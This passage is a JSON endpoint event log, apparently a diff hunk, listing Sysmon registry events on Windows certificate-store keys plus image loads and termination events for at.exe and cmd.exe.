"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "at.exe", - "image_path": "C:\\Windows\\System32\\at.exe", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803390000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573803700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "schedcli.dll", - "image_path": "C:\\Windows\\System32\\schedcli.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803540000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "process", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "subtype": "terminate", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "process", - "pid": 7672, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001082DF5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 